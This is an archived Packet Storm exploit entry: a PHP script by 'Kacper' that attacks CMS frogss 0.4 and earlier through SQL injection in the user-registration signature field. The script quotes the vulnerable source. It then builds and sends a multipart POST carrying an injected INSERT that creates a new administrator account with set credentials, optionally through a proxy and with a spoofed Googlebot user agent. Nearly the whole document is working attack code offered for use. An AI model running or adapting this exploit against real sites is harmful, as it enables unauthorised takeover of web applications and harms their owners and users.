Frogss-php.txt

2006-08-27T00:00:00
ID PACKETSTORM:49428
Type packetstorm
Reporter Kacper
Modified 2006-08-27T00:00:00

Description

                                        
                                            `<?php  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";  
echo "+\r\n";  
echo "- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\r\n\r\n";  
echo "+\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";  
echo "+\r\n\r\n";  
echo "- CMS frogss <= 0.4 (podpis) SQL Injection Exploit [creat new admin]"\r\n";  
echo "+"\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";  
echo "+"\r\n";  
echo "- [Script name: CMS frogss v.0.4"\r\n";  
echo "- [Script site: http://frogss.be/download.php?id=1"\r\n";  
echo "+"\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";  
echo "+"\r\n";  
echo "- Find by: Kacper (a.k.a Rahim)"\r\n";  
echo "+"\r\n";  
echo "- Contact: kacper1964@yahoo.pl"\r\n";  
echo "- or"\r\n";  
echo "- http://www.rahim.webd.pl/"\r\n";  
echo "+"\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";  
echo "+"\r\n";  
echo "- Special Greetz: DragonHeart ;-)"\r\n";  
echo "- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]"\r\n";  
echo "+"\r\n";  
echo "!@ Przyjazni nie da sie zamienic na marne korzysci @!"\r\n";  
echo "+"\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";  
echo "+"\r\n";  
echo "- Z Dedykacja dla osoby,"\r\n";  
echo "- bez ktorej nie mogl bym zyc..."\r\n";  
echo "- K.C:* J.M (a.k.a Magaja)"\r\n";  
echo "+"\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";  
echo "+"\r\n";  
echo "Usage: www.site.com /path/ UserName Password proxy "\r\n";  
echo "ex: www.site.com <= site host "\r\n";  
echo "ex: /path/ <= script path "\r\n";  
echo "ex: Username <= exploit username "\r\n";  
echo "ex: Password <= exploit password "\r\n";  
echo "ex: proxy <= optional ;-) "\r\n";  
echo "+"\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";  
echo "EX: www.site.com /frogss/ Evil hacker 127.0.0.1 "\r\n";  
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";  
  
/*  
vulnerable code => module/rejestracja.php line 56-87:  
....  
function ok()  
{  
global $login,$haslo,$email,$miasto,$www,$gg,$tlen,$poziom,$podpis,$last_log,$logowan,$komentarzy,$odwiedzin,$ip,$lan;  
$query=mysql_query("SELECT login FROM uzytkownicy WHERE login='".$login."'");  
if (!$login) {  
  
echo 'Nie poda³e¶ Loginu';  
} elseif (!$haslo){  
echo 'Nie poda³e¶ has³a';  
} elseif (!$email)  
{  
echo 'Nie poda³e¶ e-maila';  
} elseif(mysql_num_rows($query)==0)  
{  
if($www=='http://') $www = '';  
if($gg=='gg:') $gg = '';  
if($tlen=='tlen:') $tlen = '';  
$haslomd5 = md5($haslo);  
$ip = $_SERVER['REMOTE_ADDR'];  
$query1 = "INSERT INTO uzytkownicy VALUES(NOT NULL, '$login', '$haslomd5', '$email', '$miasto', '$www', '$gg', '$tlen', '$poziom', '$podpis', NOW(), '$last_log', '$logowan', '$komentarzy', '$odwiedzin', 'offline', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '0', '0', '0', '$ip')";  
$result = mysql_query ($query1);  
if($result)  
{  
echo '<br>'.$lan['registration_add'].'<br>';  
}  
else  
{  
echo '<br>'.$lan['registration_add_error'].'<br><br>';  
}  
}  
else  
{  
....  
when we register to new user in $podpis we can insert in SQL injection ;-)  
  
*/  
  
  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
ob_implicit_flush (1);  
function show($headeri)  
{  
$ii=0;$ji=0;$ki=0;$ci=0;  
echo '<table border="0"><tr>';  
while ($ii <= strlen($headeri)-1){  
$datai=dechex(ord($headeri[$ii]));  
if ($ji==16) {  
$ji=0;  
$ci++;  
echo "<td>  </td>";  
for ($li=0; $li<=15; $li++) {  
echo "<td>".htmlentities($headeri[$li+$ki])."</td>";  
}  
$ki=$ki+16;  
echo "</tr><tr>";  
}  
if (strlen($datai)==1) {  
echo "<td>0".htmlentities($datai)."</td>";  
}  
else {  
echo "<td>".htmlentities($datai)."</td> ";  
}  
$ii++;$ji++;  
}  
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {  
echo "<td>&nbsp&nbsp</td>";  
}  
for ($li=$ci*16; $li<=strlen($headeri); $li++) {  
echo "<td>".htmlentities($headeri[$li])."</td>";  
}  
echo "</tr></table>";  
}  
  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
  
function sendpacket()  
{  
global $proxy, $host, $port, $packet, $html, $proxy_regex;  
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);  
if ($socket < 0) {  
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {echo 'Not a valid proxy...';  
die;  
}  
echo "OK.<br>";  
echo "Attempting to connect to ".$host." on port ".$port."...<br>";  
if ($proxy=='') {  
$result = socket_connect($socket, $host, $port);  
}  
else {  
$parts =explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$result = socket_connect($socket, $parts[0],$parts[1]);  
}  
if ($result < 0) {  
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";  
}  
else {  
echo "OK.<br><br>";  
$html= '';  
socket_write($socket, $packet, strlen($packet));  
echo "Reading response:<br>";  
while ($out= socket_read($socket, 2048)) {$html.=$out;}  
echo nl2br(htmlentities($html));  
echo "Closing socket...";  
socket_close($socket);  
}  
}  
}  
  
function refresh()  
{  
flush();  
ob_flush();  
usleep(5000000000);  
}  
  
function sendpacketii($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex;  
if ($proxy=='') {  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
echo 'No response from '.htmlentities($host); die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
echo 'Not a valid prozy...';die;  
}  
$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
echo 'No response from proxy...';die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {  
$html.=fread($ock,1);  
}  
}  
fclose($ock);echo nl2br(htmlentities($html));  
}  
  
function make_seed()  
{  
list($usec, $sec) = explode(' ', microtime());  
return (float) $sec + ((float) $usec * 100000);  
}  
  
$host=$_POST[host];$port=$_POST[port];$path=$_POST[path];  
$USER=$_POST[USER];$PASS=$_POST[PASS];$proxy=$_POST[proxy];  
  
echo "<span class=\"Stile5\">";  
  
if (($host<>'') and ($path<>''))  
{  
$port=intval(trim($port));  
if ($port=='') {$port=80;}  
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}  
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}  
  
}  
if (($host<>'') and ($path<>'') and ($USER<>'') and ($PASS<>''))  
{  
  
$sql="') INSERT INTO uzytkownicy VALUES(1, Kacper, b98092e78aa47e68ae2ba617137960a4, devilteam@hackers.pl, NULL, http://www.rahim.webd.pl/, NULL, NULL, 0, DEVILTEAM, NOW(), 99999, 99999, 99999, 9999, offline, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 4)/*";  
$data='-----------------------------7d62702f250530  
Content-Disposition: form-data; name="login";  
  
'.$USER.'  
-----------------------------7d62702f250530  
Content-Disposition: form-data; name="haslo";  
  
'.$PASS.'  
-----------------------------7d62702f250530  
Content-Disposition: form-data; name="email";  
  
devilteam@polish-hackers.pl  
-----------------------------7d62702f250530  
Content-Disposition: form-data; name="miasto";  
  
localhost  
-----------------------------7d62702f250530  
Content-Disposition: form-data; name="www";  
  
http://www.rahim.webd.pl/  
-----------------------------7d62702f250530  
Content-Disposition: form-data; name="gg";  
  
000000  
-----------------------------7d62702f250530  
Content-Disposition: form-data; name="tlen";  
  
h20  
-----------------------------7d62702f250530--  
Content-Disposition: form-data; name="podpis";  
  
'.$sql.'  
-----------------------------7d62702f250530--  
';  
  
$packet ="POST ".$p."login.php HTTP/1.1\r\n";  
$packet.="User-Agent: Googlebot/2.1\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Accept: text/plain\r\n";  
$packet.="Referer: http://".$host.$path."index.php?lang=en\r\n";  
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.=$data;  
$packet.="Connection: Close\r\n";  
show($packet);  
sendpacketii($packet);  
if (!eregi("Location:",$html)) {die("Failed to login...");}  
$temp=explode("Set-Cookie: ",$html);  
$COOKIE='';  
for ($i=1; $i<=6; $i++)  
{  
$temp2=explode(" ",$temp[$i]);  
$COOKIE.=" ".$temp2[0];  
}  
if (eregi("The user has successfully been added",$html))  
{  
echo "exploit succeeded... now login as admin\n";  
echo "with username \"Kacper"\" and password \"devilteam"\"\n";  
echo ".$host."/Administracja/index.php\"\n";  
echo "Greetz ;-)"\n";  
}  
?>  
`